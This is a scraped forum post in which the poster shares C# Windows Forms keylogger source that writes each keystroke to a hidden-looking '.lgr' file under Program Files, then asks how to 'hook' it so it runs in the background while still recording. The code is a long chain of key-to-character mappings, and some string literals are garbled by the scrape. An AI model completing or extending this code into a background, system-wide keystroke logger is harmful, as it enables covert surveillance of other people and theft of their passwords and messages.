How can I Hook Keyboard with this code? (Code in Body)

EDN Admin

Well-known member
Joined
Aug 7, 2010
Messages
12,794
Location
In the Machine
using System;<br/>
using System.Collections.Generic;<br/>
using System.ComponentModel;<br/>
using System.Data;<br/>
using System.Drawing;<br/>
using System.Linq;<br/>
using System.Text;<br/>
using System.Windows.Forms;<br/>
using System.IO;
namespace WindowsFormsApplication1<br/>
{<br/>
public partial class Form1 : Form<br/>
{<br/>
public Form1()<br/>
{<br/>
InitializeComponent();<br/>
}<br/>
DateTime dt = DateTime.Now;<br/>
StreamWriter other = new StreamWriter(@"C:Program FilesWindows KeysKey.lgr", true);<br/>
private void Form1_Load(object sender, EventArgs e)<br/>
{<br/>
other.Write(Environment.NewLine + "Started: " + dt + Environment.NewLine);<br/>
other.Close();<br/>
}<br/>
private void Form1_KeyDown(object sender, KeyEventArgs e)<br/>
{<br/>
StreamWriter kl = new StreamWriter(@"C:Program FilesWindows KeysKey.lgr", true);<br/>
if (e.KeyData == Keys.A)<br/>
{<br/>
kl.Write("a");<br/>
}<br/>
else if (e.Control && e.Alt && e.Shift && e.KeyCode == Keys.O)<br/>
{<br/>
/*Console.ReadLine();<br/>
* or<br/>
* this.unhook();<br/>
*
<br/>
*/<br/>
}<br/>
else if (e.Control && e.Alt && e.Shift && e.KeyCode == Keys.A)<br/>
{<br/>
/*<br/>
* this.hook();<br/>
*
<br/>
*/<br/>
}<br/>
else if (e.KeyData == Keys.B)<br/>
{<br/>
kl.Write("b");<br/>
}<br/>
else if (e.KeyData == Keys.C)<br/>
{<br/>
kl.Write("c");<br/>
}<br/>
else if (e.KeyData == Keys.D)<br/>
{<br/>
kl.Write("d");<br/>
}<br/>
else if (e.KeyData == Keys.E)<br/>
{<br/>
kl.Write("e");<br/>
}<br/>
else if (e.KeyData == Keys.F)<br/>
{<br/>
kl.Write("f");<br/>
}<br/>
else if (e.KeyData == Keys.G)<br/>
{<br/>
kl.Write("g");<br/>
}<br/>
else if (e.KeyData == Keys.H)<br/>
{<br/>
kl.Write("h");<br/>
}<br/>
else if (e.KeyData == Keys.I)<br/>
{<br/>
kl.Write("i");<br/>
}<br/>
else if (e.KeyData == Keys.J)<br/>
{<br/>
kl.Write("j");<br/>
}<br/>
else if (e.KeyData == Keys.K)<br/>
{<br/>
kl.Write("k");<br/>
}<br/>
else if (e.KeyData == Keys.L)<br/>
{<br/>
kl.Write("l");<br/>
}<br/>
else if (e.KeyData == Keys.M)<br/>
{<br/>
kl.Write("m");<br/>
}<br/>
else if (e.KeyData == Keys.N)<br/>
{<br/>
kl.Write("n");<br/>
}<br/>
else if (e.KeyData == Keys.O)<br/>
{<br/>
kl.Write("o");<br/>
}<br/>
else if (e.KeyData == Keys.P)<br/>
{<br/>
kl.Write("p");<br/>
}<br/>
else if (e.KeyData == Keys.Q)<br/>
{<br/>
kl.Write("q");<br/>
}<br/>
else if (e.KeyData == Keys.R)<br/>
{<br/>
kl.Write("r");<br/>
}<br/>
else if (e.KeyData == Keys.S)<br/>
{<br/>
kl.Write("s");<br/>
}<br/>
else if (e.KeyData == Keys.T)<br/>
{<br/>
kl.Write("t");<br/>
}<br/>
else if (e.KeyData == Keys.U)<br/>
{<br/>
kl.Write("u");<br/>
}<br/>
else if (e.KeyData == Keys.V)<br/>
{<br/>
kl.Write("v");<br/>
}<br/>
else if (e.KeyData == Keys.W)<br/>
{<br/>
kl.Write("w");<br/>
}<br/>
else if (e.KeyData == Keys.X)<br/>
{<br/>
kl.Write("x");<br/>
}<br/>
else if (e.KeyData == Keys.Y)<br/>
{<br/>
kl.Write("y");<br/>
}<br/>
else if (e.KeyData == Keys.Z)<br/>
{<br/>
kl.Write("z");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.A)<br/>
{<br/>
kl.Write("A");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.B)<br/>
{<br/>
kl.Write("B");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.C)<br/>
{<br/>
kl.Write("C");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.D)<br/>
{<br/>
kl.Write("D");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.E)<br/>
{<br/>
kl.Write("E");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.F)<br/>
{<br/>
kl.Write("F");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.G)<br/>
{<br/>
kl.Write("G");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.H)<br/>
{<br/>
kl.Write("H");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.I)<br/>
{<br/>
kl.Write("I");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.J)<br/>
{<br/>
kl.Write("J");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.K)<br/>
{<br/>
kl.Write("K");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.L)<br/>
{<br/>
kl.Write("L");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.M)<br/>
{<br/>
kl.Write("M");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.N)<br/>
{<br/>
kl.Write("N");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.O)<br/>
{<br/>
kl.Write("O");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.P)<br/>
{<br/>
kl.Write("P");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.Q)<br/>
{<br/>
kl.Write("Q");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.R)<br/>
{<br/>
kl.Write("R");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.S)<br/>
{<br/>
kl.Write("S");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.T)<br/>
{<br/>
kl.Write("T");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.U)<br/>
{<br/>
kl.Write("U");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.V)<br/>
{<br/>
kl.Write("V");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.W)<br/>
{<br/>
kl.Write("W");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.X)<br/>
{<br/>
kl.Write("X");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.Y)<br/>
{<br/>
kl.Write("Y");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.Z)<br/>
{<br/>
kl.Write("Z");<br/>
}<br/>
else if (e.KeyData == Keys.Tab)<br/>
{<br/>
kl.Write("[Tab]");<br/>
}<br/>
else if (e.KeyData == Keys.Delete)<br/>
{<br/>
kl.Write("[Delete]");<br/>
}<br/>
else if (e.KeyData == Keys.Decimal)<br/>
{<br/>
kl.Write(".");<br/>
}<br/>
else if (e.KeyData == Keys.Divide)<br/>
{<br/>
kl.Write("/");<br/>
}<br/>
else if (e.KeyData == Keys.Space)<br/>
{<br/>
kl.Write(" ");<br/>
}<br/>
else if (e.KeyData == Keys.Subtract)<br/>
{<br/>
kl.Write("-");<br/>
}<br/>
else if (e.KeyData == Keys.PrintScreen)<br/>
{<br/>
kl.Write("[PrtSc]");<br/>
}<br/>
else if (e.KeyData == Keys.CapsLock)<br/>
{<br/>
kl.Write("[CapsLock]");<br/>
}<br/>
else if (e.KeyData == Keys.End)<br/>
{<br/>
kl.Write("[End]");<br/>
}<br/>
else if (e.KeyData == Keys.Enter)<br/>
{<br/>
kl.Write("[Enter]");<br/>
}<br/>
else if (e.KeyData == Keys.Escape)<br/>
{<br/>
kl.Write("[Esc]");<br/>
}<br/>
else if (e.KeyData == Keys.F1)<br/>
{<br/>
kl.Write("[F1]");<br/>
}<br/>
else if (e.KeyData == Keys.F2)<br/>
{<br/>
kl.Write("[F2]");<br/>
}<br/>
else if (e.KeyData == Keys.F3)<br/>
{<br/>
kl.Write("[F3]");<br/>
}<br/>
else if (e.KeyData == Keys.F4)<br/>
{<br/>
kl.Write("[F4]");<br/>
}<br/>
else if (e.KeyData == Keys.F5)<br/>
{<br/>
kl.Write("[F5]");<br/>
}<br/>
else if (e.KeyData == Keys.F6)<br/>
{<br/>
kl.Write("[F6]");<br/>
}<br/>
else if (e.KeyData == Keys.F7)<br/>
{<br/>
kl.Write("[F7]");<br/>
}<br/>
else if (e.KeyData == Keys.F8)<br/>
{<br/>
kl.Write("[F8]");<br/>
}<br/>
else if (e.KeyData == Keys.F9)<br/>
{<br/>
kl.Write("[F9]");<br/>
}<br/>
else if (e.KeyData == Keys.F10)<br/>
{<br/>
kl.Write("[F10]");<br/>
}<br/>
else if (e.KeyData == Keys.F11)<br/>
{<br/>
kl.Write("[F11]");<br/>
}<br/>
else if (e.KeyData == Keys.F12)<br/>
{<br/>
kl.Write("[F12]");<br/>
}<br/>
else if (e.KeyData == Keys.Insert)<br/>
{<br/>
kl.Write("[Insert]");<br/>
}<br/>
else if (e.KeyData == Keys.Left)<br/>
{<br/>
kl.Write("
");<br/>
}<br/>
else if (e.KeyData == Keys.Multiply)<br/>
{<br/>
kl.Write("*");<br/>
}<br/>
else if (e.KeyData == Keys.Next)<br/>
{<br/>
kl.Write("[PgDn]");<br/>
}<br/>
else if (e.KeyData == Keys.NumLock)<br/>
{<br/>
kl.Write("[NumLock]");<br/>
}<br/>
else if (e.KeyData == Keys.NumPad0)<br/>
{<br/>
kl.Write("[NumPad0]");<br/>
}<br/>
else if (e.KeyData == Keys.NumPad1)<br/>
{<br/>
kl.Write("[NumPad1]");<br/>
}<br/>
else if (e.KeyData == Keys.NumPad2)<br/>
{<br/>
kl.Write("[NumPad2]");<br/>
}<br/>
else if (e.KeyData == Keys.NumPad3)<br/>
{<br/>
kl.Write("[NumPad3]");<br/>
}<br/>
else if (e.KeyData == Keys.NumPad4)<br/>
{<br/>
kl.Write("[NumPad4]");<br/>
}<br/>
else if (e.KeyData == Keys.NumPad5)<br/>
{<br/>
kl.Write("[NumPad5]");<br/>
}<br/>
else if (e.KeyData == Keys.NumPad6)<br/>
{<br/>
kl.Write("[NumPad6]");<br/>
}<br/>
else if (e.KeyData == Keys.NumPad7)<br/>
{<br/>
kl.Write("[NumPad7]");<br/>
}<br/>
else if (e.KeyData == Keys.NumPad8)<br/>
{<br/>
kl.Write("[NumPad8]");<br/>
}<br/>
else if (e.KeyData == Keys.NumPad9)<br/>
{<br/>
kl.Write("[NumPad9]");<br/>
}<br/>
else if (e.KeyData == Keys.PageUp)<br/>
{<br/>
kl.Write("[PgUp]");<br/>
}<br/>
else if (e.KeyData == Keys.Right)<br/>
{<br/>
kl.Write("
");<br/>
}<br/>
else if (e.KeyData == Keys.PageDown)<br/>
{<br/>
kl.Write("[PgDn]");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.OemSemicolon)<br/>
{<br/>
kl.Write(":");<br/>
}<br/>
else if (e.KeyData == Keys.OemSemicolon)<br/>
{<br/>
kl.Write(";");<br/>
}<br/>
else if (e.KeyData == Keys.D1)<br/>
{<br/>
kl.Write("1");<br/>
}<br/>
else if (e.KeyData == Keys.D2)<br/>
{<br/>
kl.Write("2");<br/>
}<br/>
else if (e.KeyData == Keys.D3)<br/>
{<br/>
kl.Write("3");<br/>
}<br/>
else if (e.KeyData == Keys.D4)<br/>
{<br/>
kl.Write("4");<br/>
}<br/>
else if (e.KeyData == Keys.D5)<br/>
{<br/>
kl.Write("5");<br/>
}<br/>
else if (e.KeyData == Keys.D6)<br/>
{<br/>
kl.Write("6");<br/>
}<br/>
else if (e.KeyData == Keys.D7)<br/>
{<br/>
kl.Write("7");<br/>
}<br/>
else if (e.KeyData == Keys.D8)<br/>
{<br/>
kl.Write("8");<br/>
}<br/>
else if (e.KeyData == Keys.D9)<br/>
{<br/>
kl.Write("9");<br/>
}<br/>
else if (e.KeyData == Keys.D0)<br/>
{<br/>
kl.Write("0");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.D1)<br/>
{<br/>
kl.Write("!");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.D2)<br/>
{<br/>
kl.Write("@");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.D3)<br/>
{<br/>
kl.Write("#");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.D4)<br/>
{<br/>
kl.Write("$");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.D5)<br/>
{<br/>
kl.Write("%");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.D6)<br/>
{<br/>
kl.Write("^");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.D7)<br/>
{<br/>
kl.Write("&");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.D8)<br/>
{<br/>
kl.Write("*");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.D9)<br/>
{<br/>
kl.Write("(");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.D0)<br/>
{<br/>
kl.Write(")");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.Oemcomma)<br/>
{<br/>
kl.Write("<");<br/>
}<br/>
else if (e.KeyCode == Keys.Oemcomma)<br/>
{<br/>
kl.Write(",");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.OemPeriod)<br/>
{<br/>
kl.Write( ");<br/>
}<br/>
else if (e.KeyCode == Keys.OemPeriod)<br/>
{<br/>
kl.Write(".");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.OemQuestion)<br/>
{<br/>
kl.Write("?");<br/>
}<br/>
else if (e.KeyCode == Keys.OemQuestion)<br/>
{<br/>
kl.Write("/");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.D1)<br/>
{<br/>
kl.Write("!");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.OemQuotes)<br/>
{<br/>
kl.Write(""");<br/>
}<br/>
else if (e.KeyCode == Keys.OemQuotes)<br/>
{<br/>
kl.Write("");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.Oemtilde)<br/>
{<br/>
kl.Write("~");<br/>
}<br/>
else if (e.KeyCode == Keys.Oemtilde)<br/>
{<br/>
kl.Write("`");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.OemCloseBrackets)<br/>
{<br/>
kl.Write("}");<br/>
}<br/>
else if (e.KeyCode == Keys.OemCloseBrackets)<br/>
{<br/>
kl.Write("]");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.OemOpenBrackets)<br/>
{<br/>
kl.Write("{");<br/>
}<br/>
else if (e.KeyCode == Keys.OemOpenBrackets)<br/>
{<br/>
kl.Write("[");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.OemMinus)<br/>
{<br/>
kl.Write("_");<br/>
}<br/>
else if (e.KeyCode == Keys.OemMinus)<br/>
{<br/>
kl.Write("-");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.Oemplus)<br/>
{<br/>
kl.Write("+");<br/>
}<br/>
else if (e.KeyCode == Keys.Oemplus)<br/>
{<br/>
kl.Write("=");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.OemPipe)<br/>
{<br/>
kl.Write("|");<br/>
}<br/>
else if (e.KeyCode == Keys.OemPipe)<br/>
{<br/>
kl.Write("\");<br/>
}<br/>
else if (e.KeyData == Keys.Up)<br/>
{<br/>
kl.Write("[Up]");<br/>
}<br/>
else if (e.KeyData == Keys.Down)<br/>
{<br/>
kl.Write("[Down]");<br/>
}<br/>
else if (e.KeyData == Keys.Back)<br/>
{<br/>
kl.Write("[Backspace]");<br/>
}<br/>
else if (e.KeyData == Keys.Scroll)<br/>
{<br/>
kl.Write("[Scroll]");<br/>
}<br/>
else if (e.KeyData == Keys.Home)<br/>
{<br/>
kl.Write("[Home]");<br/>
}<br/>
else if (e.KeyData == Keys.Pause)<br/>
{<br/>
kl.Write("[Pause]");<br/>
}<br/>
else if (e.Shift && e.KeyCode == Keys.Pause)<br/>
{<br/>
kl.Write("[Break]");<br/>
}<br/>
else if (e.KeyData == Keys.LButton)<br/>
{<br/>
kl.Write("[Click]");<br/>
}<br/>
else if (e.KeyData == Keys.RButton)<br/>
{<br/>
kl.Write("[RClick]");<br/>
}<br/>
else if (e.KeyData == Keys.MButton)<br/>
{<br/>
kl.Write("[MouseMidClick]");<br/>
}<br/>
kl.Close();<br/>
}<br/>
}<br/>
}<br/>
//How can I hook this so it will run in the background and still recieve/write to the file?

View the full article
 
Back
Top